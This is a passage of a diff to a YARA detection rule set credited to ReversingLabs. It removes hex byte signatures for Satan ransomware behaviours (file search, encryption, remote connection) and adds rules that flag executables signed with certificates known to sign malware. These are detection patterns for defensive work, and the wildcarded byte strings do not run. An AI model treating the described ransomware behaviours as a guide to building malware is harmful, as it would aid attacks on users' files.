85 ?? ?? ?? ?? B8 - ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? - ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC - ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89 - 1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ?? - 5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 - EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? - 85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? - 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? - 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 - ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? - ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B - 44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9 - } - $encrypt_files_5 = { - FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF - 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 - 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? - ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? - ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 - ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 - 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? - 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC - ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 - ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 - 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 - ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 - E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 - ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F - 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? - ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 - ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 - } - $search_files_4 = { - FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ?? - 83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B - 00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? - ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? - ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? - 89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 - 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ?? - ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? - 89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? - ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2 - } - $remote_connection_3 = { - 55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ?? - ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 - 44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ?? - 74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ?? - ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B - 45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04 - 43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ?? - ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ?? - 74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? - 8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? - ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B - 0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "START ARCHITECTURE LTD" and (pe.signatures[i].serial=="00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures[i].serial=="ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20") and 1554940800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "308a73cd-a142-56ad-8dca-808ab455b43e" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16436-L16454" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (($search_files and $encrypt_files and $remote_connection) or ($encrypt_files_2 and $remote_connection and $search_files) or ($search_files_2 and $encrypt_files_3 and $remote_connection_2) or ($install_service and $search_files_3 and $encrypt_files_4) or ($search_files_4 and $encrypt_files_5 and $remote_connection_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADVANCED ACCESS SERVICES LTD" and (pe.signatures[i].serial=="00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures[i].serial=="ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee") and 1650931200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE { meta: - description = "Yara rule that detects Satan ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7ec379d8-172c-52ee-9284-6898dd446468" - date = "2020-07-15" - modified = "2020-07-15" + id = "0f9fa6c6-372d-5948-94ba-9e3fee956647" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16456-L16472" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Satan" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 - C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ?? - 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50 - 8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ?? - ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4 - ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50 - 56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ?? - ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 - 5D C3 - } - $search_processes = { - 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F - 44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ?? - 8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 - ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B - E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? - ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D - ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89 - 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ?? - ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ?? - ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F - 84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF - 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? - FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88 - 45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75 - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ?? - B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6 - C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ?? - 74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ?? - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $search_files_in_specific_folders_p1 = { - 51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF - } - $search_files_in_specific_folders_p2 = { - 75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 - F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B - CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 - 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D - 4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 - 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 - C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 - EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84 - C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 